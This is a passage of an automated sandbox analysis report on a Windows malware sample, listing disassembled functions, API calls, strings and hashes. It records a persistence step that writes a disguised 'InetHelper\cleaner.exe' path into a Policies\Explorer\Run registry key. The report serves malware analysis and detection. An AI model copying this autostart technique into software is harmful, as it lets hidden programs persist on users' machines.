                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$InetHelper$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 1941528284-122770931
                                                                                                                                                                                                              • Opcode ID: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction ID: ededab686cc318fc7e7b90f4c09e4a826d398c1608d56966c744d50d12e1e378
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841B571900518BADF107BA5CD85DAF3679EF4532DB20423FF416B10E2DB3C8A929A6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004032DE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 474 4032de-403306 GetTickCount 475 403436-40343e call 402e8e 474->475 476 40330c-403337 call 40345d SetFilePointer 474->476 481 403440-403444 475->481 482 40333c-40334e 476->482 483 403350 482->483 484 403352-403360 call 403447 482->484 483->484 487 403366-403372 484->487 488 403428-40342b 484->488 489 403378-40337e 487->489 488->481 490 403380-403386 489->490 491 4033a9-4033c5 call 406943 489->491 490->491 492 403388-4033a8 call 402e8e 490->492 497 403431 491->497 498 4033c7-4033cf 491->498 492->491 499 403433-403434 497->499 500 4033d1-4033d9 call 405f90 498->500 501 4033f2-4033f8 498->501 499->481 504 4033de-4033e0 500->504 501->497 503 4033fa-4033fc 501->503 503->497 505 4033fe-403411 503->505 506 4033e2-4033ee 504->506 507 40342d-40342f 504->507 505->482 508 403417-403426 SetFilePointer 505->508 506->489 509 4033f0 506->509 507->499 508->475 509->505
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(006F3A2A,00000000,00000000,004266D0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • HA, xrefs: 004033A9
                                                                                                                                                                                                              • 5=B, xrefs: 004033AE, 004033C7
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00403337, 004033D2
                                                                                                                                                                                                              • *:o, xrefs: 004032E1, 004033FE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                                                                                              • String ID: *:o$5=B$HA$timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 1092082344-71510955
                                                                                                                                                                                                              • Opcode ID: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction ID: fd4332e341476289c3f76e81f79fa789cc737db0b0adfb813ccc5192894bdc6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231B171600211DBC7209F26FE8496A3BA8F7643567C9423BEC40B62E0CB385D11DB1E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 510 40264a-402663 call 402c1f 513 402ac5-402ac8 510->513 514 402669-402670 510->514 517 402ace-402ad4 513->517 515 402672 514->515 516 402675-402678 514->516 515->516 518 4027dc-4027e4 516->518 519 40267e-40268d call 406348 516->519 518->513 519->518 523 402693 519->523 524 402699-40269d 523->524 525 402732-402735 524->525 526 4026a3-4026be ReadFile 524->526 528 402737-40273a 525->528 529 40274d-40275d call 405f61 525->529 526->518 527 4026c4-4026c9 526->527 527->518 531 4026cf-4026dd 527->531 528->529 532 40273c-402747 call 405fbf 528->532 529->518 537 40275f 529->537 534 4026e3-4026f5 MultiByteToWideChar 531->534 535 402798-4027a4 call 40632f 531->535 532->518 532->529 534->537 538 4026f7-4026fa 534->538 535->517 541 402762-402765 537->541 542 4026fc-402707 538->542 541->535 544 402767-40276c 541->544 542->541 545 402709-40272e SetFilePointer MultiByteToWideChar 542->545 546 4027a9-4027ad 544->546 547 40276e-402773 544->547 545->542 548 402730 545->548 550 4027ca-4027d6 SetFilePointer 546->550 551 4027af-4027b3 546->551 547->546 549 402775-402788 547->549 548->537 549->518 552 40278a-402790 549->552 550->518 553 4027b5-4027b9 551->553 554 4027bb-4027c8 551->554 552->524 555 402796 552->555 553->550 553->554 554->518 555->518
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                              • String ID: 9
                                                                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                                                                              • Opcode ID: 624626f4f5892e412f857cef7a92b39e94472dde615dcc0e6b59693489985feb
                                                                                                                                                                                                              • Instruction ID: eb16fdd1ee542fe42bbdfa0ebba740301294627c6441dfc4cb46f4c2e9c1cdcc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 624626f4f5892e412f857cef7a92b39e94472dde615dcc0e6b59693489985feb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF511A75D00219AEDF21DF95DA88AAEB775FF04304F50443BE905B72D0DBB89982CB18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 556 406752-406772 GetSystemDirectoryW 557 406774 556->557 558 406776-406778 556->558 557->558 559 406789-40678b 558->559 560 40677a-406783 558->560 562 40678c-4067bf wsprintfW LoadLibraryExW 559->562 560->559 561 406785-406787 560->561 561->562
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 563 402598-4025aa 564 4025c7-4025ca 563->564 565 4025ac-4025c5 call 402c1f 563->565 567 4025fb-402608 call 402c41 lstrlenW 564->567 568 4025cc-4025f9 call 402c41 WideCharToMultiByte lstrlenA 564->568 574 40260a-402610 565->574 567->574 568->574 575 402616-402621 call 406348 574->575 576 40288b-402ad4 574->576 581 402623-402626 575->581 582 402637-402640 call 405f90 575->582 581->582 584 402628-402631 call 405fbf 581->584 587 402645 582->587 584->576 584->582 587->576
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                              • lstrlenA.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 3109718747-572866773
                                                                                                                                                                                                              • Opcode ID: 79fe6349def6cc650f231a14f4b83c981983240ca263c31f9bdf3a4ba712873e
                                                                                                                                                                                                              • Instruction ID: 8a54b08748082a87d090de781de000be55bd47bcbf4860f745c9e519e4ad5c94
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79fe6349def6cc650f231a14f4b83c981983240ca263c31f9bdf3a4ba712873e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66110872A05201BADB146BF18E8DA9F7664AF44398F20483BF502F21D1DDFC89815B5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406943 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 589 406943-406966 590 406970-406973 589->590 591 406968-40696b 589->591 593 406976-40697f 590->593 592 407390-407394 591->592 594 406985 593->594 595 40738d 593->595 596 406a31-406a35 594->596 597 406aa1-406aa5 594->597 598 40698c-406990 594->598 599 406acc-407173 594->599 595->592 600 4072e1-4072eb 596->600 601 406a3b-406a54 596->601 604 4072f0-4072fa 597->604 605 406aab-406abf 597->605 602 406996-4069a3 598->602 603 407378-40738b 598->603 610 407175-40718b 599->610 611 40718d-4071a3 599->611 600->603 607 406a57-406a5b 601->607 602->595 608 4069a9-4069ef 602->608 603->592 604->603 609 406ac2-406aca 605->609 607->596 613 406a5d-406a63 607->613 614 4069f1-4069f5 608->614 615 406a17-406a19 608->615 609->597 609->599 612 4071a6-4071ad 610->612 611->612 616 4071d4-4071e0 612->616 617 4071af-4071b3 612->617 618 406a65-406a6c 613->618 619 406a8d-406a9f 613->619 620 406a00-406a0e GlobalAlloc 614->620 621 4069f7-4069fa GlobalFree 614->621 622 406a27-406a2f 615->622 623 406a1b-406a25 615->623 616->593 624 407362-40736c 617->624 625 4071b9-4071d1 617->625 627 406a77-406a87 GlobalAlloc 618->627 628 406a6e-406a71 GlobalFree 618->628 619->609 620->595 629 406a14 620->629 621->620 622->607 623->622 623->623 624->603 625->616 627->595 627->619 628->627 629->615
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00406943
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 0-1897978588
                                                                                                                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 630 4023e4-402415 call 402c41 * 2 call 402cd1 637 402ac5-402ad4 630->637 638 40241b-402425 630->638 639 402427-402434 call 402c41 lstrlenW 638->639 640 402438-40243b 638->640 639->640 642 40243d-40244e call 402c1f 640->642 643 40244f-402452 640->643 642->643 647 402463-402477 RegSetValueExW 643->647 648 402454-40245e call 4031d6 643->648 652 402479 647->652 653 40247c-40255d RegCloseKey 647->653 648->647 652->653 653->637
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 2655323295-1638566638
                                                                                                                                                                                                              • Opcode ID: 25f827e3e11746b9e5ee3687016ce8942fde3681089ea3dd2e236ad5f1a11635
                                                                                                                                                                                                              • Instruction ID: a6a83690551736ab877e244042d38f3be3a1a43997e1cd9886aee1f7f0d2369c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25f827e3e11746b9e5ee3687016ce8942fde3681089ea3dd2e236ad5f1a11635
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10118471D00104BEEB10AFA5DE89EAEBB74AB44714F11803BF504F71D1DAF88D819B18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004031D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 738 4031d6-4031e3 739 403201-40320a call 4032de 738->739 740 4031e5-4031fb SetFilePointer 738->740 743 403210-403223 call 405f61 739->743 744 4032d8-4032db 739->744 740->739 747 4032c8 743->747 748 403229-40323c call 4032de 743->748 750 4032ca-4032cb 747->750 752 403242-403245 748->752 753 4032d6 748->753 750->744 754 4032a4-4032aa 752->754 755 403247-40324a 752->755 753->744 756 4032ac 754->756 757 4032af-4032c6 ReadFile 754->757 755->753 758 403250 755->758 756->757 757->747 759 4032cd-4032d0 757->759 760 403255-40325f 758->760 759->753 761 403261 760->761 762 403266-403278 call 405f61 760->762 761->762 762->747 765 40327a-403281 call 405f90 762->765 767 403286-403288 765->767 768 4032a0-4032a2 767->768 769 40328a-40329c 767->769 768->750 769->760 770 40329e 769->770 770->753
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID: *:o
                                                                                                                                                                                                              • API String ID: 973152223-843036820
                                                                                                                                                                                                              • Opcode ID: 0cc0faf384b4c78b6fdc9eeda5bbee131a155eebafb64ec0174871a4b91cb037
                                                                                                                                                                                                              • Instruction ID: 354a74280fc320ddcd1a03d564711161fa861bb1e5dc1acee3c93741f06a9d18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cc0faf384b4c78b6fdc9eeda5bbee131a155eebafb64ec0174871a4b91cb037
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB316B30200219BBDB109F95ED44A9A3E68EB04759F20417EF904E61D0D7389E51DBA9
